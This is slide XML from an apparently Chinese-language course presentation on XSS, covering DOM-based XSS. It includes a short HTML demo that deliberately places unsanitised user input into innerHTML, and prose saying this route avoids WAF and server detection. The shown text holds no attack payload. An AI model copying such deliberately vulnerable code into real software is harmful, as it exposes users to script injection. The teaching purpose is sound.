                  <a:pt x="3819525" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="228600" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182533" y="4644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139624" y="17966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100793" y="39045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66960" y="66960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39045" y="100793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17966" y="139624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4644" y="182533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="228600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4644" y="274666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17966" y="317575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39045" y="356406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66960" y="390239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100793" y="418154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139624" y="439233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182533" y="452555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228600" y="457200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3819525" y="457200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3865591" y="452555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3908500" y="439233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3947331" y="418154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3981164" y="390239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4009079" y="356406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4030158" y="317575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4043480" y="274666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4048125" y="228600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4043480" y="182533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4030158" y="139624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4009079" y="100793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3981164" y="66960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3947331" y="39045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3908500" y="17966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3865591" y="4644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3819525" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="TextBox 115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5143500" y="3620135"/>
            <a:ext cx="1781175" cy="339757"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="15907" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="125"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="195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rPr>
              <a:t>知识储备</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="195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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="AutoShape 116"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4350226" y="3524821"/>
            <a:ext cx="509587" cy="585787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId8">
              <a:alphaModFix amt="100000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="TextBox 117"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4516754" y="3600132"/>
            <a:ext cx="176530" cy="334645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="15907" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="12700" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="125"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" spc="15">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" spc="15">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131" name="Freeform 119"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4914900" y="4382135"/>
            <a:ext cx="4048125" cy="457200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4048125" h="457200">
                <a:moveTo>
                  <a:pt x="3819525" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="228600" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182533" y="4644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139624" y="17966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100793" y="39045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66960" y="66960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39045" y="100793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17966" y="139624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4644" y="182533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="228600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4644" y="274666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17966" y="317575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39045" y="356406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66960" y="390239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100793" y="418154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139624" y="439233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182533" y="452555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228600" y="457200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3819525" y="457200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3865591" y="452555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3908500" y="439233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3947331" y="418154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3981164" y="390239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4009079" y="356406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4030158" y="317575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4043480" y="274666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4048125" y="228600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4043480" y="182533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4030158" y="139624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4009079" y="100793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3981164" y="66960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3947331" y="39045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3908500" y="17966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3865591" y="4644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3819525" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="TextBox 120"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5143500" y="4458335"/>
            <a:ext cx="2886075" cy="339757"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="15907" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="125"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="195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rPr>
              <a:t>任务实施</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="195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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="AutoShape 121"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4350226" y="4363021"/>
            <a:ext cx="509587" cy="585787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId8">
              <a:alphaModFix amt="100000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="TextBox 122"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4516754" y="4438332"/>
            <a:ext cx="176530" cy="323215"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="15907" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="12700" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="125"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="200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rPr>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="200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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="Freeform 123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4914900" y="5296535"/>
            <a:ext cx="4048125" cy="457200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4048125" h="457200">
                <a:moveTo>
                  <a:pt x="3819525" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="228600" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182533" y="4644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139624" y="17966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100793" y="39045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66960" y="66960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39045" y="100793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17966" y="139624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4644" y="182533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="228600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4644" y="274666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17966" y="317575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39045" y="356406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66960" y="390239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100793" y="418154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139624" y="439233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182533" y="452555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228600" y="457200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3819525" y="457200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3865591" y="452555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3908500" y="439233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3947331" y="418154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3981164" y="390239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4009079" y="356406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4030158" y="317575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4043480" y="274666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4048125" y="228600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4043480" y="182533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4030158" y="139624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4009079" y="100793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3981164" y="66960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3947331" y="39045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3908500" y="17966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3865591" y="4644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3819525" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="TextBox 124"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5143500" y="5372735"/>
            <a:ext cx="3733800" cy="339757"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="15907" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="125"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="195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rPr>
              <a:t>项目小结</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="195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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="AutoShape 125"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4350226" y="5277421"/>
            <a:ext cx="509587" cy="585787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId8">
              <a:alphaModFix amt="100000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="TextBox 126"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4516754" y="5352732"/>
            <a:ext cx="176530" cy="323215"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="15907" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="12700" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="125"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="200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rPr>
              <a:t>6</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="200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7" name="TextBox 7"/>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XSS的分类</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4" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="1201420"/>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3. DOM型XSS</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15" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="1676400"/>
            <a:ext cx="10400030" cy="3322955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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rPr>
              <a:t>输入的恶意代码不会经过服务器，在前端被js代码直接读取放置到前端的标签中，是一 种特殊的反射型XSS。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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rPr>
              <a:t>漏洞成因：DOM型XSS是基于DOM文档对象模型的。对于浏览器来说，DOM文档就是一份XML文档，当有了这个标准的技术之后，通过JavaScript就可以轻松的访问DOM。当确认客户端代码中有DOM型XSS漏洞时，诱使(钓鱼)一名用户访问自己构造的URL，利用步骤和反射型很类似，但是唯一的区别就是，构造的URL参数不用发送到服务器端，可以达到绕过WAF、躲避服务端的检测效果。</a:t>
            </a:r>
            <a:endParaRPr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7" name="TextBox 7"/>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XSS的分类</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4" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="1201420"/>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3. DOM型XSS</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15" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1600200"/>
            <a:ext cx="10400030" cy="5169535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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下面编写一个简单的含有 DOM XSS漏洞的 HTML 代码：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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&lt;meta charset="UTF-8"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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    function xss(){</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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        var str = document.getElementById("src").value;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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        document.getElementById("demo").innerHTML = "&lt;img src='"+str+"' /&gt;";</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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    }</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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&lt;input type="text" id="src" size="50" placeholder="输入图片地址" /&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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&lt;input type="button" value="插入" onclick="xss()" /&gt;&lt;br&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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&lt;div id="demo" &gt;&lt;/div&gt;</a:t>
            </a:r>
            <a:endParaRPr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7" name="TextBox 7"/>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XSS的分类</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4" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="1201420"/>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3. DOM型XSS</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15" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1600200"/>
            <a:ext cx="10400030" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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用户输入框插入图片地址后，如图10-3所示。页面会将图片插入在id=“demo”的div标签中，从而显示在网页上。同样，这里也没有对用户的输入进入过滤，当攻击者构造如下语句插入的时候：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 3" descr="3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3771265" y="2819400"/>
            <a:ext cx="5284470" cy="3389630"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="6324600"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-3 插入图片地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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7" name="TextBox 7"/>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XSS的分类</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4" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="1201420"/>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3. DOM型XSS</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15" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
